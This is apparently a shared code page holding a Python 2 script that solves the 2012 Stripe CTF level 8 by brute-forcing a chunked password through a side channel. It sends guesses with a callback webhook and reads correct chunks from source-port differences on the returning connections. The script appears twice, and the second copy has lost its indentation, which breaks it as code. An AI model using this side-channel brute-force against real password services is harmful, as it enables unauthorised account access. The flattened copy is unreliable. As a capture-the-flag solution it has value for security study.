stamparm · August 30, 2012 22:10
diff --git a/level8.py b/level8.py
 import os
 import socket
 import sys
 import threading
 import time
 import traceback
 import urllib2

 production = True

 if not production:
    PASSWORD_DB_ADDRESS = "http://157.247.180.223:3000"
    SOURCE_ADDRESS = "157.247.180.194"
    SOURCE_PORT = 12350
 else:
    PASSWORD_DB_ADDRESS = "https://level08-1.stripe-ctf.com/user-ubnudputbk/"
    SOURCE_ADDRESS = "level02-4.stripe-ctf.com"
    SOURCE_PORT = 51451

 DATA_FORMAT = "{\"password\": \"%s\", \"webhooks\": [\"%s\"]}"

 raw_password = [000, 000, 000, 000]
 index = 0

 content = None
 webhook_socket = None

 webhook_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 webhook_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
 webhook_socket.bind(("", SOURCE_PORT))

 prev_last_port = None
 last_port = 0

 def webhook_thread():
    global prev_last_port, last_port
    while True:
        webhook_socket.listen(1)
        conn, addr = webhook_socket.accept()
        data = conn.recv(1024)
        prev_last_port = last_port
        last_port = addr[1]
        conn.close()

 threading.Thread(target=webhook_thread).start()

 def check_password(password):
    global prev_last_port, last_port, index, content

    sys.stdout.write("\r%s" % password)
    sys.stdout.flush()

    def _():
        global prev_last_port, content
        data = DATA_FORMAT % (password, "%s:%d" % (SOURCE_ADDRESS, SOURCE_PORT))
        content = urllib2.urlopen(PASSWORD_DB_ADDRESS, data).read()

        while prev_last_port is None:
            time.sleep(0.1)

        diff = (last_port or 0) - (prev_last_port or 0)
        prev_last_port = None
        return diff

    diff = _()

    if diff == 2:
        pass
    elif diff == 3 and _() == 3:
        if index == 0:
            print "\r[i] First chunk found '%.3d'" % raw_password[index]
            index += 1
        else:
            pass
    elif diff == 4 and _() == 4:
        if index == 1:
            print "\r[i] Second chunk found '%.3d'" % raw_password[index]
            index += 1
        else:
            pass
    elif diff == 5 and _() == 5:
        if index == 2:
            print "\r[i] Third chunk found '%.3d'" % raw_password[index]
            index += 1
        elif index == 3:
            if 'true' in content:
                print "\r[i] Fourth chunk found '%.3d'" % raw_password[index]
                os._exit(0)
    elif diff < 10:
        print "[x] There were problems with (password='%s'/prev_last_port=%s/last_port=%s)" % (raw_password, prev_last_port, last_port)

 while True:
    try:
        _ = "%.3d%.3d%.3d%.3d" % (raw_password[0] % 1000, raw_password[1] % 1000, raw_password[2] % 1000, raw_password[3] % 1000)
        check_password(_)

    except KeyboardInterrupt:
        print "(%s)" % (raw_password)
        break
    except Exception, ex:
        traceback.print_stack()
        print "'%s' (%s)" % (ex, raw_password)
    finally:
        raw_password[index] += 1

 webhook_socket.close()
 os._exit(0)
	import os
	import socket
	import sys
	import threading
	import time
	import traceback
	import urllib2

	production = True

	if not production:
	PASSWORD_DB_ADDRESS = "http://157.247.180.223:3000"
	SOURCE_ADDRESS = "157.247.180.194"
	SOURCE_PORT = 12350
	else:
	PASSWORD_DB_ADDRESS = "https://level08-1.stripe-ctf.com/user-ubnudputbk/"
	SOURCE_ADDRESS = "level02-4.stripe-ctf.com"
	SOURCE_PORT = 51451

	DATA_FORMAT = "{\"password\": \"%s\", \"webhooks\": [\"%s\"]}"

	raw_password = [000, 000, 000, 000]
	index = 0

	content = None
	webhook_socket = None

	webhook_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	webhook_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
	webhook_socket.bind(("", SOURCE_PORT))

	prev_last_port = None
	last_port = 0

	def webhook_thread():
	global prev_last_port, last_port
	while True:
	webhook_socket.listen(1)
	conn, addr = webhook_socket.accept()
	data = conn.recv(1024)
	prev_last_port = last_port
	last_port = addr[1]
	conn.close()

	threading.Thread(target=webhook_thread).start()

	def check_password(password):
	global prev_last_port, last_port, index, content

	sys.stdout.write("\r%s" % password)
	sys.stdout.flush()

	def _():
	global prev_last_port, content
	data = DATA_FORMAT % (password, "%s:%d" % (SOURCE_ADDRESS, SOURCE_PORT))
	content = urllib2.urlopen(PASSWORD_DB_ADDRESS, data).read()

	while prev_last_port is None:
	time.sleep(0.1)

	diff = (last_port or 0) - (prev_last_port or 0)
	prev_last_port = None
	return diff

	diff = _()

	if diff == 2:
	pass
	elif diff == 3 and _() == 3:
	if index == 0:
	print "\r[i] First chunk found '%.3d'" % raw_password[index]
	index += 1
	else:
	pass
	elif diff == 4 and _() == 4:
	if index == 1:
	print "\r[i] Second chunk found '%.3d'" % raw_password[index]
	index += 1
	else:
	pass
	elif diff == 5 and _() == 5:
	if index == 2:
	print "\r[i] Third chunk found '%.3d'" % raw_password[index]
	index += 1
	elif index == 3:
	if 'true' in content:
	print "\r[i] Fourth chunk found '%.3d'" % raw_password[index]
	os._exit(0)
	elif diff < 10:
	print "[x] There were problems with (password='%s'/prev_last_port=%s/last_port=%s)" % (raw_password, prev_last_port, last_port)

	while True:
	try:
	_ = "%.3d%.3d%.3d%.3d" % (raw_password[0] % 1000, raw_password[1] % 1000, raw_password[2] % 1000, raw_password[3] % 1000)
	check_password(_)

	except KeyboardInterrupt:
	print "(%s)" % (raw_password)
	break
	except Exception, ex:
	traceback.print_stack()
	print "'%s' (%s)" % (ex, raw_password)
	finally:
	raw_password[index] += 1

	webhook_socket.close()
	os._exit(0)